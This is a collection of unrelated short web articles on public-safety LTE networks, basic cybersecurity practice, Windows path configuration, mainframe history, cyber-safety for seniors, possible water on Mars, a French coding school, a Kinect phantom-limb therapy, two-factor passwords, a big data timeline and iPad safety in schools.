Absolutely. The FCC, in its national broadband plan, and the federal Department of Commerce, with its forward-thinking grant program for broadband, are lighting the way for a new public safety network which will be more robust, national in scope, and interoperable. By "interoperable" I mean the new public safety equipment will probably operate almost anywhere in the nation, whether on a dedicated government network or on a commercial cell phone network. Here are some features of the new networks:
- The FCC and major public safety organizations have called for the new public safety networks to be built using a fourth generation (4G) technology called LTE - long-term evolution. Not coincidentally, this is the same technology which will be used by the major cell phone companies Verizon and AT&T when they construct their 4G networks. The commercial networks will operate on different frequencies than the public safety networks, but they will all be built in the same general area of the wireless spectrum - the 700 megahertz (MHz) band.
- Because they are all using the same technology (LTE) and are in a similar slice of radio spectrum (700 MHz) potentially they will all interoperate. That means that public safety officers will use the government networks and frequencies when they are within range, but could "roam" to a commercial network if necessary. So cops and firefighters will have the best of both worlds - coverage from dedicated government networks and coverage from multiple private carriers. The FCC is even considering rules which would require the commercial companies to give public safety priority on the commercial LTE networks.
- Because everyone - consumers, cops, firefighters and even general government workers in transportation and utilities - will be using LTE, constructing the networks can be much cheaper. Commercial telecommunications carriers could put government antennas and equipment at their cell sites, and vice-versa. Perhaps the network equipment at the cell site, or even the central switches, could be shared as well. Public safety will still be using its own frequencies and have priority, but could share many other network elements.
- And the radios used by individual public safety officers or placed in police vehicles and fire trucks can be much cheaper as well. Because manufacturers are all making equipment for the same technology - LTE - it could cost just a few hundred dollars. Again, there will be specialized and ruggedized devices for firefighters and others working in punishing environments, but the "innards" - the electronics - will be much less expensive.
- Next, we have to get all first and second responders to use the same or common networks. Here in Washington State, for example, we have multiple overlapping and duplicate networks. City and county police and fire in the region have one network, and each electric utility (e.g., Seattle City Light) has another. Transportation departments have their own networks (e.g., Seattle Transportation and Washington State Transportation each have a separate network). The Washington State Patrol has its own separate network. The State Department of Natural Resources has its own network. Fish and Wildlife has its own network. And federal government agencies (FBI, customs and immigration) have their own networks. This is patently stupid and expensive. As we build these new fourth generation LTE networks, we need to build a single network with lots of sites and a lot of redundancy and hardening to withstand disasters. And everyone - first and second responders from all agencies - should use it.
- Finally, and perhaps most importantly, all the networks will be nationally interoperable. The lack of communications interoperability was a major finding of the commission which investigated the September 11th World Trade Center attack. But with these new networks, a Seattle police officer's 4th generation LTE device will also work on New York City's LTE network or New Mexico's LTE network or on any Verizon or AT&T network anywhere in the nation. As disasters happen anywhere in the United States, and first and second responders are rushed to the scene of the disaster, they can take their communications gear with them and it will work.
The City of Seattle is one of a handful (about 20) forward-thinking governments leading the way to deploy these new networks. Seattle's public safety LTE network, hopefully launched with a federal stimulus grant, will eventually expand throughout the Puget Sound region and across the State of Washington. The State of Oregon also has authority and a grant request to build an LTE network, and we are working with Oregon to make sure our networks work with each other seamlessly.
Is all of this a pipe dream? I don't think so. A number of public and private companies, governments, telecommunications carriers and equipment manufacturers are working together to realize it. Many of them are in the Public Safety Alliance. In the federal government, the FCC is working with the National Institute of Standards and Technology, and the Departments of Commerce and Homeland Security are providing grant funding. It will take a lot of work and many years to realize this network.
But when it is finished, we'll have public safety networks which work to keep us safe, and consumer networks which work to keep us productive and linked to our friends and families. These networks will be separate yet connected. They will be built from common technologies. And they will be less expensive for taxpayers than the networks we have today. | <urn:uuid:b16346b2-2973-40c0-9de2-fb71a7441682> | CC-MAIN-2017-04 | http://www.govtech.com/dc/blog/Why-Dont-Cops-Just-Use-Cell-Phones.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280791.35/warc/CC-MAIN-20170116095120-00526-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.961477 | 2,273 | 2.59375 | 3 |
Attacks against websites, databases and applications in recent years have made federal and public sector organizations inured to the typical everyday attack. Yes, these organizations are very much aware of today’s challenging security landscape and are taking appropriate actions to lessen the damage of attacks, but more can be done.
Today’s main security challenges include big data, cloud, mobility and mainframe issues -- and each presents potential issues for critical infrastructure and systems. Organizations often want to immediately “identify” where an attack originated, simply thinking that will solve the issue. However, the focus should remain on practical steps organizations can take to proactively reduce the risk of future attacks.
Risk mitigation does work in lowering the threat level, and is one of the recommendations to federal and public sector organizations as a basis for addressing the problem overall. Many agencies are applying these recommendations now, much like private enterprise, and organizations will see them increasingly taking a more risk-based approach.
The elements of a successful cybersecurity program are composed of some simple and direct actions. Here are five points that should be considered:
1. Collect and correlate everything. This one sounds simple enough, but in practice it takes some degree of forethought. How to collect and, more importantly, how to correlate what you have collected are critical factors. Organizations should measure it all, but also really look at how data is being correlated, with apples-to-apples comparisons.
2. Automate. This came with a mantra of automate everything, then automate it again. Not only does collection have to be automated, but so does the monitoring. As humans, we cannot process the enormous amount of data generated in modern computing environments and recognize the events that should be correlated, let alone alerted on.
3. Cover every vector. An attack or vulnerability could come from anywhere: social engineering, website drive-bys, spear phishing, USB drops or mobile. Organizations have to have a means to discover it all.
4. Know your network. Organizations need to know what runs on the network, everyone who is on the network, and what devices are attached to it.

5. Know your incident response.
Points one through three are the basics; they will prepare you for point four and reduce the vulnerability surface available to attackers. These are the new basics for enterprise defense and for acquiring incident response.
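As a toy illustration of points one and two, the sketch below correlates collected login events and alerts when failures from a single source cross a limit. The field names and threshold are invented; a real deployment would feed a SIEM, but the principle is the same:

```python
from collections import Counter

THRESHOLD = 5  # invented alert threshold

def correlate(events):
    """Count failed logins per source IP and flag likely brute-force activity."""
    failures = Counter(
        e["src_ip"] for e in events
        if e["type"] == "login" and not e["success"]
    )
    return [ip for ip, count in failures.items() if count >= THRESHOLD]

events = [
    {"type": "login", "src_ip": "203.0.113.7", "success": False}
] * 6 + [
    {"type": "login", "src_ip": "198.51.100.2", "success": True}
]
print(correlate(events))  # ['203.0.113.7'] -> hand off to a human for response
```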
Ultimately, federal and public sector organizations have to wonder where they are in the cybersecurity lifecycle. What the industry has collectively learned is doing some basic items while working across the organization is foundational to good cybersecurity. Integrating these simple elements into a strategy is the basis for continuously diagnosing and mitigating networks – and using technology as an enabler to do so.
However, use the technology to automate correlation and draw conclusions that alert a human to a condition, who can then make a security response decision. It makes the difference between being drawn into an incident unprepared and knowing exactly how to execute the basics.
Path is an environment variable that contains the path prefixes that certain applications, utilities, and functions use to search for an executable file. The Path Configuration enables you to add path prefixes to this variable.
Provide a name and description for the Path Configuration
Specify the path to be added to the environment variables. Multiple paths can be specified separated by a semi-colon (;). Click the icon to select and assign a dynamic variable to the Path variable.
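For example, a single configuration might supply the value C:\Program Files\Java\bin;D:\Scripts to add both a Java runtime directory and a scripts directory at once (the directories shown here are illustrative, not defaults).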
Using the Defining Targets procedure, define the targets for deploying the Path Configuration.
Click the Deploy button to deploy the defined Path Configuration in the targets defined. The configurations will take effect during the next system startup.
To save the configuration as draft, click Save as Draft. | <urn:uuid:b9153806-8973-450e-afe8-e2802ea446cd> | CC-MAIN-2017-04 | https://www.manageengine.com/products/desktop-central/help/computer_configuration/setting_path.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280791.35/warc/CC-MAIN-20170116095120-00526-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.803557 | 153 | 2.5625 | 3 |
The start of the mainframe era, heralded by the delivery of the IBM(R) System/360 in April 1964, enabled computing for business and government. As business back-office work was computerized, IT was asked to manage the systems and not just operate them. This meant having some way to find out what the systems were doing.

In 1967, Boole and Babbage (acquired by BMC in 1999) developed the seminal programs CUE (Computer Utilization Evaluator) and PPE (Problem Program Evaluator) to report on how the resources in a computer were being used. Not only did these software tools answer the immediate need for IT, they spawned systems management solutions that would continue to be invented and enhanced over the ensuing five decades of the mainframe.
BMC Innovations that Changed Mainframe Management (1964 – 1970)
(Watch this blog in coming weeks for reminiscences about these innovations.)
1967 – PPE was the first tool to give IT visibility into how programs were executing and using CPU resources.

1967 – CUE was the first tool to give IT visibility into how devices were being accessed.
You can also view a fifty year timeline and more information on our mainframe anniversary page at www.bmc.com/mainframeanniversary
(R) Trademarks or registered trademarks of International Business Machines Corporation in the United States, in other countries, or both. | <urn:uuid:b9bcf59a-47ac-4690-8e4e-7bf1d613bcf6> | CC-MAIN-2017-04 | http://www.bmc.com/blogs/50-bmc-mainframe-innovations-system360-period1964-1970/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00250-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.945893 | 294 | 3.171875 | 3 |
The Australian Human Rights Commission has called on the federal government to adopt the Joint Select Committee’s Cyber Safety for Seniors report recommendations, saying that this will help senior citizens to stay safe online while increasing access to services.
The report, entitled A Worthwhile Journey, was presented to the Parliament speaker on 16 April, 2013.
It includes a number of recommendations such as publicising the Broadband for Seniors kiosks. More than 2000 computer kiosks are located around Australia offering free Internet access and training for seniors. The initiative also aims to build social inclusion among senior citizens who, according to the report, sometimes face isolation.
In addition, the report recommended that a telephone hotline be created for those who were not confident in using Web-based information. A Broadband for Seniors website – which includes cyber safety tips – was developed in early 2013.
According to Age Discrimination Commissioner Susan Ryan, eight of the report’s 13 recommendations draw from the Commission’s submissions.
“One of the most important recommendations we made was in relation to researching fraud victimization of older people. I am pleased to see that the report recognises older people can be the targets of cybercriminals because they have substantial assets and may be less savvy technology users,” she said in a statement.
“The Committee’s recommendations about the need to teach older users how to protect themselves from cyber fraud, and to make reporting cybercrime online easier for them, are extremely important.”
If the cyber safety recommendations are adopted, Ryan said she expected more people aged over 65 would “feel confident” enough to gain computer skills and go online to access information and services they need.
Follow Hamish Barwick on Twitter: @HamishBarwick | <urn:uuid:46ac8a9b-3bb3-480b-a2a1-c72049e733bd> | CC-MAIN-2017-04 | http://www.computerworld.com.au/article/461120/senior_citizens_need_cyber_safety_protection_human_rights_commission/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00306-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953187 | 361 | 2.515625 | 3 |
NASA scientists have long chanted a mantra about Mars: follow the water, follow the water. So, we sent a lander to the northern latitudes looking for extant ice. More recently, the Mars Curiosity rover has been exploring planetary features that seem created by long-ago water flows, at least if Martian geology is as familiar as we think it is.
But what about water now? Flowing water.
Georgia Tech scientists working with the Mars Reconnaissance Orbiter spotted some seasonal darkening along some slopes during warm weather. In the orbiter's images, the lines move from right to left down the slope of the Newton crater. They're called "recurring slope lineae."
It looks, to eyes on Earth, like some kind of water flow.
"We still don't have a smoking gun for existence of water in RSL, although we're not sure how this process would take place without water," the graduate student who discovered the RSL, Lujendra Ojha, said in a NASA release.
But temperatures on Mars are too cold for regular old H2O. The water would have to have some kind of natural anti-freeze in it. And that's what Ojha and Georgia Tech professor James Wray went looking for in new studies.
They found that iron concentrations increase in RSL regions as the lines get darker and longer. The scientists hypothesize that it's some kind of iron-based antifreeze flowing in the water, perhaps, they suggest, ferric sulfate.
In any case, these recent studies don't conclusively prove whether there is flowing water on Mars, nor do they begin to answer the big question: could this water support some sort of life? After all, it is the necessity of water for life as we know it that makes scouring Mars for water NASA's reasonable MO.
But it does make for an exciting time for Martian researchers: flowing water on Mars would be a very big deal. | <urn:uuid:c9c66d4c-5a0c-483c-8d23-f201175aec64> | CC-MAIN-2017-04 | http://www.nextgov.com/emerging-tech/2014/02/gif-shows-what-might-be-water-flowing-mars/78569/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00214-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.967587 | 402 | 3.765625 | 4 |
Computer viruses and other malware such as worms, trojans and spyware, are rife and can cause tremendous damage to systems that become infected. Because of this, anti-virus (AV) technology is one of the most commonly deployed security controls used by the vast majority of computer users, from individuals to large organisations. According to the 2009 CSI Computer Crime and Security Survey, more than 99% of respondents have AV technology deployed.
Having been on the market for some years, there are a wide variety of choices of AV technology, from standalone tools to AV bundled into security suites that integrate a variety of other security controls. Many standalone tools are offered for free and provide just basic protection. According to OPSWAT Inc, in its Worldwide AV Market Share Report of June 2010, free AV tools account for 42% of the total market share.
Even with the use of AV technology being so widespread, malware infections were cited as the worst security incident faced by respondents to the CSI survey and are growing in number and complexity. This is echoed in the Information Security Breaches Survey 2010 commissioned, by Infosecurity Europe, which found that 62% of large organisations surveyed had been infected with malware in the previous year, up from 21% three years previously, and 43% of small organisations, up three-fold over three years. Overall, malware infections were the cause of the worst security incident faced by organisations of all sizes over the previous year.
Such malware attacks are growing fast in sophistication and complexity, often using variants of known exploits that aim to get around defences that have been put in place. In mid-2010, technology vendor McAfee released research showing that 10 million malware samples had been entered into its database during the first half of 2010 alone, the majority of which are variants of known families of malware. For example, it states that it is not uncommon to see more than 10,000 variants of the Koobface worm, which looks to harvest information from users of social networking sites, in a single month. The complexity of new malware can be seen in the case of the Conficker worm, which combines the use of a number of advanced malware techniques to make it harder to eradicate it. Often introduced into computer networks via infected removable media, the worm blocks access to anti-malware websites, disables automatic updates that could include a patch against it and kills any anti-malware protection installed on the device. Its authors are also known to test Conficker against anti-malware defences commercially available to ensure that it can defeat them.
Factors such as these mean that traditional AV protection, based on signatures identifying and patching known threats, provide little defence. This leaves users in an endless cycle of updating their AV software with patches as they are released and cleaning up infections that have occurred, which often requires support from the AV technology vendor. And here is the rub. Very few free AV products include any kind of support from the vendor and the cost of support can add a hefty price tag. Plus, only some products provide protection based on detecting patterns of behaviour that can be used to identify unknown threats, leaving users with huge gaps in protection.
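To see why purely signature-based detection struggles with variants, consider a toy hash-matching scanner. This is a deliberate simplification (commercial engines use far richer signatures and heuristics), and the "database" below holds just the SHA-256 digest of one known sample:

```python
import hashlib

# Toy signature database: the SHA-256 digest of one known-bad payload (b"test").
KNOWN_BAD = {"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"}

def flagged(payload: bytes) -> bool:
    return hashlib.sha256(payload).hexdigest() in KNOWN_BAD

print(flagged(b"test"))   # True  - the known sample is caught
print(flagged(b"test!"))  # False - a one-byte variant evades the signature
```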
Many traditional standalone AV products--both free and paid-for versions--are also ineffective against new sophisticated threats that are often highly targeted and use a range of blended mechanisms to make their payload more successful. For example, a user may be sent a personalised phishing email that urges them to click on a link that takes them to a website infected with malware. Many standalone AV products provide no defence against such attacks as they do not include controls for protecting users from websites infected with malware or provide proactive protection against phishing attacks.
Anyone relying on legacy, standalone, signature-based AV controls is putting themselves at risk of being the victim of an attack that could cost them dearly. This goes beyond the costs of clearing up after an attack and the time and cost involved with patching devices or purchasing updated versions of the software. Javelin Strategy & Research estimates that more than nine million Americans have had their identities stolen through their personal details being harvested from internet applications or other means.
According to the UK Home Office, identity theft costs the UK economy £1.2 billion per year.
That does not mean to say that computer users should not deploy AV controls. Rather, AV and other anti-malware technologies should be one component of a layered security defence, along with a host of other tools and services. These include a firewall and intrusion prevention capabilities, web filtering and blocking, email, phishing and spam protection, and, for consumers, parental control functionality. These security controls should be integrated and should be managed through one central console or interface, in the case where the products are administered and managed for the user by a hosted service provider. For true, proactive protection against all threats affecting computer users, the provider should offer proactive threat intelligence services to identify previously unknown threats as they are encountered.
For any computer user--home users, small businesses or large organisations--the cost of the technology is a prime concern, especially as budgets are under pressure. But those costs need to be weighed against both the burden of maintaining legacy AV controls, including upgrading and vendor support costs, and the dangers of not having their systems adequately protected. The costs of remediating a security incident can far outstrip those of upgrading to better protection.
For many small businesses and consumers, a cultural change is required. The survey referenced above from Infosecurity shows that 83% of small organisations with fewer than 50 employees had experienced a security incident during 2009, up from 45% the year before. And the average cost of clearing up after an incident for such organisations ranged from £27,500 to £55,000. Clearly it is not just large organisations that are being victimised.
The key to lowering such costs is to purchase multi-tier protection. Rather than thinking that it is sufficient to place security controls to guard the perimeter of the organisation, the cultural change that is needed is to start thinking of security in terms of the assets that need to be protected--sensitive personal information and intellectual property and the like that can be used for financial gain.
Organisations of any size, and consumers alike, should look to gain an understanding of what impact the loss or compromise of such assets would be on their business or their personal life. Then they will be in a position to decide what controls need to be put in place to protect those assets from the whole gamut of threats facing computer users today. There are many hidden costs in anything that appears to be free or low cost and, in business, a bargain is rarely as good as it sounds. | <urn:uuid:bdba921b-52dd-4c27-b003-1c7ee7d678e5> | CC-MAIN-2017-04 | https://www.bloorresearch.com/blog/security-blog/anti-virus-alone-is-a-poor-strategy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00122-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963342 | 1,348 | 3.21875 | 3 |
Dual passwords can keep phishers at bay
- By John Breeden II
- Dec 10, 2012
After South Carolina’s Department of Revenue was hacked in November, exposing 3.8 million Social Security numbers, 387,000 credit and debit card numbers and 657,000 business tax filings, state officials announced plans to implement a dual-authentication password system to better protect information.
What the state had at the time of the attack offered next to no security: a single-password security system, with almost none of the data encrypted.
A simple phishing attack gained access to one employee’s user name and password, and the hackers were off to the races, allegedly accessing the financial system at will for well over a month before the hack was discovered, according to The State newspaper.
Federal agencies have two-factor authentication, the second factor in the form of a token such as a Personal Identity Verification card (civilian agencies) or Common Access Card (defense). But public-sector agencies without that kind of protection could turn to dual password systems.
There are two main dual-authentication password systems in use today, outside of biometrics.
The method frequently used by banks, online games and any site with high-value transactions is called one-time password. It’s almost always used as a second line of defense behind the usual name and password protection. The key is that the second password changes very often, sometimes as quickly as every minute, but certainly no less than every 90 seconds. A security server uses a mathematical algorithm to keep changing the password. Of course, users need to know that changing password, and this information is given to them via a portable device that can both keep track of time and has the same mathematical formula as the server. So the mobile device and the security server come up with the same numbers at the same time.
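The rotating-password scheme described above is standardized as the time-based one-time password (TOTP) algorithm of RFC 6238, built on the HOTP construction of RFC 4226. A minimal sketch follows; the base32 secret is a placeholder, and real deployments add tolerance for clock drift:

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, step: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32)
    counter = int(time.time()) // step           # both sides derive the same counter
    msg = struct.pack(">Q", counter)
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                   # dynamic truncation (RFC 4226)
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % 10**digits
    return str(code).zfill(digits)

# The server and the token compute the same code within each 30-second window.
print(totp("JBSWY3DPEHPK3PXP"))
```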
For a user to get access to a protected system, he has to enter the right password at the right time. Some fancy password systems include a USB key or a smart card as part of the mobile device, and a user has to insert the token into a system he is using to access the data, whereby the password is automatically applied.
If the password on the token matches the current one on the security server, access is granted. This makes it almost phishing-proof because even if a user somehow gives out the second password, it’s only valid for a very short time. And in the case of the automatic passwords, a user probably never actually knows what the rotating passwords are. He just inserts his key to gain access. A phisher or hacker who gains the primary password doesn’t get into the system, and attempts to break the second password after the first is approved will trigger alarm bells in any halfway decent monitoring setup.
The second method involves encrypting all files and folders with a program such as BitLocker, in which encryption acts like the second password. If a hacker is able to access a system, say, by using a phishing attack, he still doesn’t get anywhere. All the files will be encrypted gibberish.
The value of this system is that even if someone steals all of the files, he likely won’t be able to make use of them because of the encryption protecting the data. It also makes data monitoring systems more effective because they can detect if someone accesses a system properly, but then runs into walls each time he tries to use a file.
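The effect is easy to demonstrate with any authenticated encryption layer. The sketch below uses the Fernet recipe from Python's cryptography package as a stand-in for volume-level tools such as BitLocker; the record contents are fake:

```python
from cryptography.fernet import Fernet

key = Fernet.generate_key()    # held by the user, e.g. unlocked at login
vault = Fernet(key)

record = vault.encrypt(b"SSN: 000-00-0000")
print(record)                  # a thief who copies the file sees only this ciphertext
print(vault.decrypt(record))   # only the key holder recovers the plaintext
```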
In truth, a system like the one in South Carolina that protects Social Security information and tax records can never be too protected. It should probably have both secondary password methods in use, for a triple-security login, plus system monitoring. But either of the two methods alone would have stopped the rather unsophisticated attack on the South Carolina system had it been in place at the time of the breach. The state just made it easy for the hacker, and provided a valuable lesson in what not to do.
John Breeden II is a freelance technology writer for GCN. | <urn:uuid:4eac7558-0d64-4731-bc41-f3f7a6180cb9> | CC-MAIN-2017-04 | https://gcn.com/articles/2012/12/10/dual-authentication-passwords-south-carolina-hack.aspx?admgarea=JR_CYBER | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00058-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.949763 | 833 | 2.53125 | 3 |
The U.S. and U.K. track phone calls and Internet usage extensively
The first revelation from the Snowden files came on June 5, 2013, courtesy of the Guardian newspaper. That initial story revealed how extensively the NSA tracked phone calls, even of U.S. citizens -- contradicting the NSA's earlier statements to Congress that only noncitizens were targeted. Later, it was revealed that the NSA relied on spy agencies such as Britain's GCHQ to spy on Americans on its behalf where the law prevented the NSA from doing so directly.
Several federal judges called the NSA program unconstitutional, President Barack Obama ultimately called for its scope to be reduced, and the U.S. House of Representatives passed a bill limiting NSA phone tracking, though the Senate has not yet acted.
At the Guardian: The NSA files | <urn:uuid:e557256b-9e13-4db4-bf74-c7fa057b5b90> | CC-MAIN-2017-04 | http://www.cio.com/article/2369294/security0/155647-There-are-no-secrets-Edward-Snowdens-big-revelations.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00388-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955957 | 165 | 2.53125 | 3 |
French Coding School in U.S. to Offer New Approach

By Samuel Greengard | Posted 2016-08-02
A French tech school brings unconventional learning methods to the U.S. This type of peer-to-peer, project-based approach may represent the future of learning.
Finding highly qualified coders is a huge and growing challenge. According to various industry statistics, deficits now extend into the hundreds of thousands globally, and the shortage is expected to worsen in the years ahead.
One organization taking aim at the challenge is Ecole 42, a private French coding school that flips the concept of learning upside down. Tuition is free, there is no formal curriculum or school hours, and textbooks and instructors do not exist.
Students embark on a self-paced program that leads to graduation anywhere from 12 months to five years in the future. They can even take time off to volunteer or travel. Along the way, students must navigate an array of challenges that lead to advanced thinking about coding and software development.
"We teach students how to work together to solve problems," says co-founder and president Nicolas Sadirac.
The mastermind of this concept is French billionaire Xavier Niel, founder and majority shareholder of French ISP and telecom Iliad, which operates under the brand name Free. In 2013, he provided 70 million Euros to create Ecole 42, a reference to Douglas Adams' book The Hitchhiker's Guide to the Galaxy, in which the number 42 is the answer to the ultimate question of life, the universe and everything.
The school has about 2,500 students. Every year, around 80,000 students take a tough online test, and 3,000 are invited to a one-month piscine, which translates to swimming pool in French. The name is significant because students essentially sink or swim, and about 1,000 gain admission to the school.
Incredibly, more than 40 percent of the school's students did not finish high school, and 30 percent have no previous coding experience. Many also couldn't afford to go to school without this program.
Small Groups Tackle Coding Challenges
Once accepted, the students work in small groups and tackle coding challenges that span areas such as mobile, augmented reality (AR), virtual reality (VR), artificial intelligence (AI), cyber-security and robotics. The school's software analyzes how well they work in groups, how much knowledge they share and what progress they make.
Sharing isn't cheating; it's part of an essential collaboration process. Gamification methods lead students to Level 21 (half of 42), at which point they graduate. Already, the school boasts about 2,000 graduates working at 70 companies, including many top Silicon Valley firms.
Now this concept is coming to America. In November, a 200,000-square-foot campus will open in Fremont, Calif., joining the Paris facility. Niel has committed another 100 million Euros for funding the U.S. campus over a 10-year span.
Offering free tuition for all students, 42 USA is expected to add 10,000 students over the next five years. It will use the same peer-to-peer learning methods as the Paris school.
"If you teach a specific coding language, it will probably be obsolete in a few years," Sadirac points out. "If you teach people how to think in a broader and more creative framework, they can adapt and adjust and do some amazing things."
A bevy of high-tech leaders have endorsed the concept. The list includes Twitter CEO and Co-founder Jack Dorsey, Nest Founder and CEO Tony Fadell, Snapchat Co-founder and CEO Evan Spiegel, and former PayPal President and current Facebook Vice President David Marcus.
Niel emphasizes that "the goal is to give back. We want to create the best coding school in the world. This approach does not work for all students, and it is not right for every situation … but we believe that it can shape the future of learning." | <urn:uuid:e305e9f2-2552-4a1c-9fa5-e32d9933e26a> | CC-MAIN-2017-04 | http://www.baselinemag.com/careers/french-coding-school-offers-new-learning-approach.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00140-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954079 | 821 | 2.515625 | 3 |
Victims of heart attacks could have their recovery process sped up with the help of Nintendo's Wii console, doctors in the US have found.
Boffins - who no doubt spent their entire research grant on games consoles rather than test tubes - discovered that playing the Wii can help rewire brain-to-muscle coordination. Unlike most computer games, players of the Nintendo Wii must mimic the physical movements involved in a game, providing a fun, low-impact way to regain coordination.
With the processing power of the Playstation 3 being used for medical research, it seems that buying a games console is no longer a frivolous expense; it is a moral - or should that be medical - imperative.
Kinect hacks are a dime a dozen these days, but this one has a health-care twist. A hacker named Benjamin Blundell is using a Kinect, a set of VR goggles, and some gyroscopes to help treat patients affected by phantom limb syndrome.
Phantom limb patients are often treated using a mirror box. The idea is to use a reflection of the remaining limb to fool the brain into thinking that the amputated limb is still there. This allows patients to "move" the phantom limb and "unclench" it from imagined painful positions. Ben's method works on a similar principle, but he decided to use a decidedly more high-tech method.
As laid out in his video explaining the project, Blundell's high-tech method has some advantages over the traditional treatment. Instead of simulating the missing limb with a mirror, Blundell's method puts patients into a virtual room where, using the Kinect and the VR goggles, patients can interact with the environment using an entire virtual body onscreen.
Just like in the traditional system, the Kinect treatment can mirror the patient's limb movement, but sensors attached to the amputated arm also allow for some measure of independent control. This will hopefully create a more natural illusion for the mind and make for more intuitive treatment.
The new system hasn't gone through extensive medical testing yet, so it's too early to call the method a complete success. But anecdotally, Blundell's first test subject reported a significant decrease in pain. The project, and paper, have been accepted to the GRAPP conference on computer graphics, so hopefully we'll hear more about this treatment in the near future.
This story, "Kinect hack helps treat phantom limb syndrome" was originally published by PCWorld. | <urn:uuid:7549e80c-7b20-4158-a8bc-3316892f7888> | CC-MAIN-2017-04 | http://www.itworld.com/article/2732231/consumerization/kinect-hack-helps-treat-phantom-limb-syndrome.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00352-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.934828 | 407 | 2.59375 | 3 |
Tracking the evolution of big data: A timeline
Big data has been the buzz in public-sector circles for just a few years now, but its roots run deep. Here’s a look at key events over the past 30 years that have affected the way data is collected, managed and analyzed, and help explain why big data is such a big deal today.
IBM releases DB2, its latest relational database management system using Structured Query Language (both developed in the 1970s), which would become a mainstay in government.
Object-oriented programming (OOP) languages, such as Eiffel, start to catch on. Although OOP dates to the 1960s, it would over the next decade become the dominant programming paradigm.
Archie, the first tool used for searching on the Internet, is created.
The World Wide Web, using HyperText Transfer Protocol (HTTP) and the HyperText Markup Language (HTML), appears as a publicly available service for sharing information.
Gopher, a TCP/IP application layer protocol for distributing, searching and retrieving documents over the Internet, is released as an alternative to the early World Wide Web. Gopher’s rise leads to two new search programs, Veronica and Jughead.
The W3Catalog, the World Wide Web's first primitive search engine, is released.
Sun releases the Java platform, with the Java language first invented in 1991. It would become one of the most widely used languages in government, particularly in Web applications that will increasingly replace face-to-face and paper transactions.
The Global Positioning System, in the works since 1972, achieves full operational capability.
Michael Cox and David Ellsworth of NASA’s Ames Research Center publish a paper on visualization in which they discuss the challenges of working with data sets too large for the computing resources at hand. “We call this the problem of big data,” they write, possibly coining the term in its current context.
Carlo Strozzi develops an open-source relational database and calls it NoSQL. A decade later, a movement to develop NoSQL databases to work with large, unstructured data sets gains momentum.
Google is founded.
Tim Berners-Lee, inventor of the World Wide Web, coins the term “Semantic Web,” a “dream” for machine-to-machine interactions in which computers “become capable of analyzing all the data on the Web.”
Wikipedia is launched.
In wake of the Sept. 11, 2001, attacks, DARPA begins work on its Total Information Awareness System, combining biometrics, language processing, predictive modeling and database technologies in one of many new data-gathering and analysis efforts by agencies.
The amount of digital information created by computers and other data systems in this one year surpasses the amount of information created in all of human history prior to 2003, according to IDC and EMC studies.
Apache Hadoop, destined to become a foundation of government big data efforts, is created.
The National Science Board recommends that NSF create a career path for “a sufficient number of high-quality data scientists” to manage the growing collection of digital information.
The number of devices connected to the Internet exceeds the world’s population.
IBM's Watson scans and analyzes 4 terabytes (200 million pages) of data in seconds to defeat two human players on “Jeopardy!”
Work begins on UnQL, a query language for NoSQL databases.
The Obama administration announces the Big Data Research and Development Initiative, consisting of 84 programs in six departments. The National Science Foundation publishes “Core Techniques and Technologies for Advancing Big Data Science & Engineering.”
IDC and EMC estimate that 2.8 zettabytes of data will be created in 2012, but that only 3 percent of what could be usable for big data is tagged and even less is analyzed. The report predicts that the digital world will hold 40 zettabytes by 2020, 57 times the number of grains of sand on all the beaches in the world.
Keeping children safe while using their iPad is extremely important for schools, teachers, and parents. The concepts of ensuring children are protected while online is often referred to as eSafety.
Three important aspects of eSafety relating to iPad use include:
- Student privacy – protecting access
- Educational environment – fostering personalized learning
- Digital citizenship – providing opportunity for growth
Student privacy: Protect access
Student data privacy is a common concern among school administration. Placing passcodes on devices is one way to help ensure a student’s personal email, social media accounts, and applications are protected. And as passcodes are put on devices, inevitably, students will forget them.
This is the main reason some schools avoid passcodes. They believe there is the potential for lost instructional time and additional strain on IT to reset passcodes when students forget. With tools in the teacher’s hands to remotely unlock and clear a passcode on an iPad, lost instructional time can be minimized and access protected — all without IT assistance.
Educational environment: Personalize learning
To get the most out of classroom time, teachers need to personalize learning and foster students’ engagement. The best way to do this is to allow them the freedom to work on projects that they enjoy, while still driving learning forward.
Teaching in this environment can be a change and an adjustment for many teachers. One resource to support this change is Casper Focus. As students are actively engaged, teachers can draw their attention back as necessary by using a new Casper Focus feature that allows them to send a customized message to each student’s iPad. This temporarily pauses what the student is working on and allows the teacher to provide instruction.
Digital citizenship: Opportunity for growth
